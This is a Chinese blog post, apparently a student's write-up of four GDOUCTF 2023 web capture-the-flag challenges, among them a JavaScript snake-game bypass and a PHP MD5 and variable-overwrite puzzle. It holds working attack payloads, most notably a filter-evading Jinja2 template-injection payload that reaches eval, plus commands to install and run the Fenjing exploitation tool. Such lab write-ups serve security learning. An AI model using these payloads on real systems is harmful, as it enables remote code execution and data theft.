GDOUCTF web

已于 2023-04-20 20:25:21 修改
阅读量1.3k 收藏 2
点赞数
文章标签: 网络安全 安全 web安全
于 2023-04-17 20:27:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74097148/article/details/130206843
版权

1、hate eat snake

第一次正式接触这种题,打开页面发现是个贪吃蛇类游戏,审计源码发现snake.js,点开审计后发现,当你坚持时长达到60秒后会显示flag,我的思路是看看代码中有没有分数限制,长度之类的,通过修改其的值来直接回显flag,但我却不知如何下手(第一次做,工具也不太熟悉),接下来参考大佬wp。

先把网页以及js代码下载到本地,审计一下代码,发现给snake设置了初始速度,那我们继续寻找有关snake速度的代码看看

window.onload = function(){
	new Snake('eatSnake',10,false);
}


var Snake = function(snakeId,speed,isAuto){
	this.width = arguments[3] || 35 ;	
	this.height = arguments[4] || 35 ;
	this.snakeId = snakeId || 'snake' ;	
	this.Grid = [] ;	
	this.snakeGrid = [] ;	
	this.foodGrid = [] ;	
	this.derectkey = 39 ; 	
	this.goX = 0 ; 		
	this.goY = 0 ; 		
	this.speed = this.oldSpeed = speed || 10 ;	
	this.stop = true,		
	this.snakeTimer = null ;	
	this.isAuto	= isAuto || false;	
	this.init();



	this.timeCounter = 0;
	this.startTime = 0;
};

 发现这里存在速度的自增,那我们直接除掉它,本地运行,控制蛇坚持60s即可(这应该很简单吧0.0)即可得到flag

该有一种,看别人的巧法,在js代码混淆中与有这样一段

if(this['getScore']()>-0x1e9*-0xf+0x5*0x6d+-0x2e*0xaa)return alert(_0x324fcb(0x2d9,0x2c3,0x2db,0x2f3)+'k3r_h0pe_t'+_0xe4a674(0x5a1,0x595,0x59e,0x57c)+'irlfriend}'),![];

将其中改为getscore>0保存,在本地运行可直接得到flag,但我解混淆发现还是看不懂,目前了解是什么加密,猜测就是当分数大于60(可能)就会弹出flag框,那你改为0直接就可以了。

剩下还有一些神奇方法,比如长按空格60s,禁用js等等都可以,大家可以试试

2、受不了一点

 <?php
error_reporting(0);   
header("Content-type:text/html;charset=utf-8");
if(isset($_POST['gdou'])&&isset($_POST['ctf'])){
    $b=$_POST['ctf'];
    $a=$_POST['gdou'];
    if($_POST['gdou']!=$_POST['ctf'] && md5($a)===md5($b)){
        if(isset($_COOKIE['cookie'])){
           if ($_COOKIE['cookie']=='j0k3r'){
               if(isset($_GET['aaa']) && isset($_GET['bbb'])){
                  $aaa=$_GET['aaa'];
                  $bbb=$_GET['bbb'];
                 if($aaa==114514 && $bbb==114514 && $aaa!=$bbb){
                   $give = 'cancanwordflag';
                   $get ='hacker!';
                   if(!isset($_GET['flag']) && !isset($_POST['flag'])){
                         die($give);
                    }
                   if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){
                       die($get);
                    }
                    foreach ($_POST as $key => $value) {
                        $$key = $value;
                   }
                    foreach ($_GET as $key => $value) {
                         $$key = $$value;
                    }
                   echo $flag;
            }else{
                  echo "洗洗睡吧";
                 }
    }else{
        echo "行不行啊细狗";
        }
  }
}
else {
  echo '菜菜';
}
}else{
  echo "就这?";
}
}else{
  echo "别来沾边";
}
?>

现在复现的时候又懵逼了,我们先一步步看

第一个if,分别传入那两个参数就行,

第二个是md5强绕过,这里采用数组的形式即可,

第三个if,设置cookie值即可,

第四个if令cookie的值为j03kr,

第五个if设置aaa,bbb这两个参数,

第六个if,这里要求他们等于114514同时又不能互相相等,根据PHP特性(字符串的弱比较,因为== 在进行比较的时候,会先将字符串类型转化成相同,再比较),在bbb后面添加字母即可,

第七个if,设置flag的两种传参方式

//这里蒙了,我借鉴大佬的wp,他们说flag的get与post传参随便设置个参数即可,但发现不可以(在比赛当中就可以),不知道复现为啥不行(解决了!这道题在比赛的时候有bug,放入题库的时候修复了)

//分析一下这个if块,它采用了两个foreach循环,目的是想要覆盖flag变量,那么我们便要想法将flag不被覆盖,于是有了下面构造变量的想法

//若添加如下?123=flag&flag=123,因为代码中会对get参数遍历。
当key=123,value=flag时,接下来有$123=$flag,紧接着有key=flag,value=123,便会有(该flag此处代表着get参数)$flag=$123(也就是=$flag(此处的flag是答案字符串,并非get参数)),接着输出$flag,回显flag,除此之外只需要post传参123=flag即可(注意两个froeach循环的value前面的$数量不同,只要仔细分析代码逻辑即可)

总之payload如下:

get:?aaa=114514&bbb=114514a&123=flag&flag=123
post: gdou[]=1&ctf[]=2&123=flag
Cookie: cookie=j0k3r

3、EZ WEB

首页看到,点击看看

 提示我们flag在周围,那么看看源码

 提示我们在url上添加src,我们访问看看

 访问后会下载一个app.py,也就是源码,我们用记事本打开,看第三个路由,我们用put方式访问后面的super...,即可读到flag,直接bp抓包修改

 得到flag

 4、<ez_ze>

提示我们是ssti注入,但我这块学的太low了(下去一定学!!!),参考大佬wp

法一、参考:CTFshow-370过滤绕过

payload:bp抓包上传即可

{% set one=(a,)|length %}
{% set zero=one-one %}
{% set two=one+one %}
{% set three=one+two %}
{% set four=two*two %}
{% set five=three+two %}
{% set six=three*two %}
{% set seven=one+six %}
{% set eight=four*two %}
{% set nine=one+eight %}
{% set ten=five*two %}
{% set pops=dict(p=a,op=a)|join %}
{% set lo=(x|reject|string|list)|attr(pops)((four)+(two*ten))%}
{% set init=(lo,lo,dict(ini=a,t=a)|join,lo,lo)|join %}
{% set cc=(lo,lo,dict(glo=a,bals=a)|join,lo,lo)|join %}
{% set ccc=(lo,lo,dict(get=a,item=a)|join,lo,lo)|join %}
{% set cccc=(lo,lo,dict(buil=a,tins=a)|join,lo,lo)|join %}
{% set evas=dict(ev=a,al=a)|join %}
{% set chs=dict(ch=a,r=a)|join %}
{% set chr=a|attr(init)|attr(cc)|attr(ccc)(cccc)|attr(ccc)(chs)%}
{% set eval=a|attr(init)|attr(cc)|attr(ccc)(cccc)|attr(ccc)(evas) %}
{% print(eval((chr((five)+(nine*ten)),chr((five)+(nine*ten)),chr((five)+(zero*ten)+(one*ten*ten)),chr((nine)+(zero*ten)+(one*ten*ten)),chr((two)+(one*ten)+(one*ten*ten)),chr((one)+(one*ten)+(one*ten*ten)),chr((four)+(one*ten)+(one*ten*ten)),chr((six)+(one*ten)+(one*ten*ten)),chr((five)+(nine*ten)),chr((five)+(nine*ten)),chr((zero)+(four*ten)),chr((nine)+(three*ten)),chr((one)+(one*ten)+(one*ten*ten)),chr((five)+(one*ten)+(one*ten*ten)),chr((nine)+(three*ten)),chr((one)+(four*ten)),chr((six)+(four*ten)),chr((two)+(one*ten)+(one*ten*ten)),chr((one)+(one*ten)+(one*ten*ten)),chr((two)+(one*ten)+(one*ten*ten)),chr((one)+(zero*ten)+(one*ten*ten)),chr((zero)+(one*ten)+(one*ten*ten)),chr((zero)+(four*ten)),chr((nine)+(three*ten)),chr((nine)+(nine*ten)),chr((seven)+(nine*ten)),chr((six)+(one*ten)+(one*ten*ten)),chr((two)+(three*ten)),chr((seven)+(four*ten)),chr((two)+(zero*ten)+(one*ten*ten)),chr((eight)+(zero*ten)+(one*ten*ten)),chr((seven)+(nine*ten)),chr((three)+(zero*ten)+(one*ten*ten)),chr((nine)+(three*ten)),chr((one)+(four*ten)),chr((six)+(four*ten)),chr((four)+(one*ten)+(one*ten*ten)),chr((one)+(zero*ten)+(one*ten*ten)),chr((seven)+(nine*ten)),chr((zero)+(zero*ten)+(one*ten*ten)),chr((zero)+(four*ten)),chr((one)+(four*ten)))|join)) %}

法二、直接用大佬工具!

手动安装,具体参考:GitHub - Marven11/Fenjing: 一个类似SQLMap的Jinja2 SSTI利用脚本 | A SQLMap-like Jinja2 SSTI cracker

git clone https://github.com/Marven11/Fenjing
cd Fenjing
python -m pip install -r requirements.txt
python -m fenjing scan --url 'http://xxx/'
输入以上命令随后,cat /flag即可得到flag

hybcx
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
原创贪吃蛇Web
08-07
本人原创贪吃蛇,可穿越自己身体、提供暂停键玩累了可以休息。积分越高蛇也就越大,适合新手把玩,js代码简单易懂加上黑色背景、白色小蛇显得格外动人。
整理项目——贪吃蛇
小白棉冻学习篇
12-13 114
从今天开始,我要整理整理之前学习的时候写的一些小demo了,自己也顺便复习一下
[SWPUCTF 2022 新生赛]贪吃蛇
weixin_61154173的博客
12-08 2211
[SWPUCTF 2022 新生赛]贪吃蛇,Cheat Engine简单使用:修改数值获得flag
GDOUCTF比赛WEB&CRYPTO方向全解!!
jayq1的博客
05-09 1965
本次wp的制作过程耗时比较长,也有一些代码源于大佬师傅们的exp,进行了一定的详细解释,有助于刚开始学习的师傅们可以看的懂,整体是比较细节的,会一步一步带大家去解题,一步步说明为什么要这样解题,题目考查了哪些知识点,希望对大家有所帮助!如有不当之处敬请批评指正!
2021长安杯—snake题解
weixin_51373492的博客
09-27 667
没报上名,只能赛后看看题,悲 elf64位,实现了一个贪吃蛇游戏,玩了一下发现过不了就开始分析了 直接开始运行,会疯狂蹦出这个东西 而且会陷入死循环 应对方法是把这玩意nop掉 然后继续分析,发现label 13是跳到gameover,所以直接通过改变函数逻辑,让程序不跳到那里就行了 这时我觉得可能直接分析下面大片代码会很繁琐,于是直接拖到最下面发现解密flag的函数 由于函数最后会print flag出来,所以我们这里可以直接通过运行程序在运行界面看到flag,而此函数中只有grid_mats是
NSSCTF doublegame题解
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
04-17 961
运行一下,是一个贪吃蛇游戏先玩一玩,蛇的移动速度太快了,玩不了查壳64位文件,无壳进入IDA分析发现这个EXE文件是开了程序基址随机化,就是每次用IDA打开指令的地址不一样我们要想使用x64dbg和IDA的时候,地址是一样的,就需要关闭随机化使用工具:CFF ExplorerDllCharacteristics点击Click here将DLL can move的对勾去掉点击OK点击Save打开字符串窗口跟进交叉引用然后将光标放在函数名,交叉引用继续查看函数的交叉引用。
[GDOUCTF 2023] 部分web题解
qq_44640313的博客
04-18 1376
GDOUCTF 2023,主要见识了fenjing的使用
[GDOUCTF 2023]hate eat snake
最新发布
2302_80059204的博客
12-14 102
这里发生了一个下插曲,F12启动不了抓包,这里可以先关闭前段认证,点击F12,再次打开认证,便可得到js文件;或者是右击鼠标通过检查得到js文件。打开靶机之后,发现是一个类似于贪吃蛇的游戏,一般对于这种题的处理手段就是查源码之类的。看见附近有有一个getScore 那就试着修改这个判断语句。就查找这一句话看看附近有没有相关的if语句。Ctrl+S搜索关键词,下头男,得到。最后再次运行游戏便可得到flag。先试玩一下,给出的结果是。
[CTFHub]响应包源代码:贪吃蛇(webweb前置技能>HTTP协议)
ZXW_NUDT的博客
04-29 1843
这道题特别简单,只要打开题目,按F12,打开网页源代码: 就可以找到flag啦!
第二届祥云杯 Web 题解1
08-03
考点:SSRF、session条件竞争随意用户名都可以登陆,接着是SSRF的内容,通过访问 http://127.0.0.1/admin/ ,获得include
CTF学习(五)
hgjiayou的博客
01-12 1054
题: 发现是个贪吃蛇游戏 提示:HTTP响应包源代码查看 思路: 1、就按照提示查看源码 2、发现flag
2021年春秋杯网络安全联赛秋季赛逆向snake.exeWriteup
热门推荐
m0_58348028的博客
11-28 1万+
[GDOUCTF 2023]
rev1ve的博客
05-17 787
再找到hahaha()所在的类为classroom,要使返回为真,三个变量赋值得为对应的值,leader指向name和rank的值,也就说明$leader=new teacher(),发现name和rank是在teacher类那里,file_get_contents()可以用php://input和data://伪协议。要执行IPO(),看到__wakeup()下,要先执行hahaha()题目是贪吃蛇游戏,F12发现被禁了,右键检查查看js代码。打开题目,f12查看网页源码发现提示/src泄露。
BUUCTF [FlareOn6]Snake
weixin_53349587的博客
01-12 2925
1.拿到文件,发现是扩展名为nes的文件,查了一下,nes文件就是一种老版的游戏,比如魂斗罗、超级玛丽等等,必须用特定的工具才能打开,在网上找了一个名为qfceux的文件可以打开,而且可以调试,打开文件: 发现是一个贪吃蛇游戏,直接Debug调试: 通过对游戏的观察和分析发现,蛇吃苹果的数量储存在内存0x25中,对0x25地址设置读写访问断点: 运行一下,让蛇吃一个苹果,然后程序中断了,断到了C82A处: 看到断点下面有一个CMP判断指令,值为0x33,猜测蛇要吃33个苹果,才能继续..
[GDOUCTF 2023] ——web方向全Write up
Leaf_initial的博客
04-17 2012
魔术方法,然后可以看到__wakeup()中会指向classroom类的hahaha函数,hahaha所需要的变量条件在school类的。把`’ [] " _ {{}} \ .都过滤了但是比较幸运的是可以用{%%},看了看他的config和self,发现都可以用。test.txt也看过了,里面和/orzorz.php中的内容一样,不过是文档形式,这里不赘述。可以看出这个通过flask框架写的一个网页,通过代码审计我们可以得知,只需要向。所以,双等号是不要求类型相同的,所以我们可以构造payload。
CTF_BUGKU_WEB_game1
weixin_42724859的博客
06-15 8174
CTF学习过程中,一道BUGKU上WEB题《game1》
GDOUCTF REVERSE题复盘
qq_66633020的博客
04-21 375
虽然在比赛期间里在做其他CTF比赛的题目而没能仔细看GDOUCTF的RE题,但在后面复盘的时候,还是学到了不少新知识和发现了自己的一些不足。
SNERT预备队招新CTF体验赛-Web(SWCTF)
Welcome To Myon'Blog !
10-03 956
1、F12 2、robots 3、game1-喂青蛙 4、game 2 - flap bird 5、game 3 - Clash 6、Get&Post 7、sql (1)手工注入 (2)工具注入 8、命令执行漏洞 9、文件上传漏洞 10、文件泄露 11、php反序列化漏洞 12、PHP绕过
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8230
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值